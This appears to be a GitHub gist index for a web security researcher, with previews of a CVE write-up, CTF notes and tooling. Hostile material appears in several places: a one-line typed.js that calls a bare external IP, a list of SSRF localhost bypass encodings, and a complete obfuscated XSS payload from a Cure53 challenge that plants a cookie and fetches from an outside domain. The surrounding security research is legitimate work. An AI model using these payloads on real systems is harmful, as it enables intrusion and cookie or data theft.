Skip to content

Instantly share code, notes, and snippets.

View bayotop's full-sized avatar

Martin Bajanik bayotop

62 followers · 1 following
View GitHub Profile
@bayotop
bayotop / typed.js
Created January 16, 2020 09:33
typed.js
fetch('http://165.227.165.4:8888');
@bayotop
bayotop / jolokia-1.6.0-csrf.md
Created July 3, 2019 07:21
CVE-2018-10899: CSRF in Jolokia 1.6.0

Summary

Jolokia 1.6.0 is vulnerable to CSRF. This holds true for properly configured instances with strict checking for origin and referrer headers. The issue was fixed in version 1.6.1.

Red Hat Security Advisory: https://access.redhat.com/security/cve/cve-2018-10899

Details

In version 1.2.1 Jolokia introduced a <strict-checking/> option within the Cross-Origin Resource Sharing policy defined in jolokia-access.xml to prevent CSRF (4.1.5).

@bayotop
bayotop / gauth.py
Last active June 27, 2019 07:38
Programmatic authentication to GCP's Identiy-Aware Proxy
# https://cloud.google.com/iap/docs/authentication-howto
import json
import time
from jwt import JWT, jwk_from_pem
import requests
jwt = JWT()
@bayotop
bayotop / hrefs.py
Last active December 4, 2018 08:36
Identify "href" (i.e., free "javascript:" XSS) and dangerouslySetInnerHtml usages in ReactJS SPAs.
import re
import sys
VULNERABLE_HREF = r'href: [^"].+[^\s]?'
DANGEROUSLY_SET_INNER_HTML = r'__html: .+[^\s]?'
STATE_VALUES = r'\.setState\({([\s\S]*?)}\)'
#false_positives = ("this.props.team.", "constants.")
def find_state_candidates(name, states):
@bayotop
bayotop / h1-702-web-ctf.md
Created June 20, 2018 20:01
h1-702 CTF 2018 - Web 1
@bayotop
bayotop / bypasses.txt
Last active March 14, 2024 15:12
Various useful bypasses
# SSRF localhost (@omespino)
http://127.0.0.1
http://[::]/ # ipv6
http://0/
http://localtest.me # dns to 127.0.0.1
http://2130706433/ # decimal
http://0x7f000001/ # hex
http://0x7f.0x00.0x00.0x01 # hex
http://0177.0.0.01 # octal
@bayotop
bayotop / cure53-2018.md
Last active May 30, 2018 06:51
Cure53 - Chinese New Year Challenge 2018

Works in latest Firefox 58.0.2 (Windows 10, 64-bit) (copy-paste into browser to preserve URL encoding):

https://henhouse.cure53.berlin?value=<svg onload="document.cookie=`user=onerror%253dalert%253bthrow document.scripts[0].attributes[0].value%252f%252f;domain=.cure53.berlin`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hRZ2FXUTlkMlZzWTI5dFpVMXpaejQ4TDNOamNtbHdkRDRtZEc5clpXNDk=`))%2bt})">&key=.element.innerHTML

When pasting into submit.cure53.berlin, the above has to be URL decoded once:

https://henhouse.cure53.berlin?value=
@bayotop
bayotop / keybase.md
Created January 15, 2018 13:23
Keybase.io GH Verification

Keybase proof

I hereby claim:

  • I am bayotop on github.
  • I am bayotop (https://keybase.io/bayotop) on keybase.
  • I have a public key whose fingerprint is 38D3 3EC0 5654 05BC 3C76 686F C090 53E7 6BFB A3FD

To claim this, I am signing this object:

@bayotop
bayotop / last-evet-id.md
Last active June 28, 2022 15:10
Sending arbitrary Last-Event-ID header values across origins using the EventSource API.

The EventSource API

The EventSource interface is used to receive server-sent events. It connects to a server over HTTP and receives events in text/event-stream format without closing the connection.

https://developer.mozilla.org/en-US/docs/Web/API/EventSource

Last-Event-ID

Setting an ID lets the browser keep track of the last event fired so that if, the connection to the server is dropped, a special HTTP header (Last-Event-ID) is set with the new request.

@bayotop
bayotop / h1_212_writeup.md
Last active January 1, 2018 12:51
h1-212 CTF

Description

https://www.hackerone.com/blog/hack-your-way-to-nyc-this-december-for-h1-212

How I found the flag

I ran an obligatory port scan, checked the IP using shodan.io, and did some basic directory discovery. I found two open ports - 22 and 80 - and one directory /flag with a message from the creators.

As this wasn't really helpful, I tried to enumerate vhosts and found one resulting in a different response: admin.acme.org.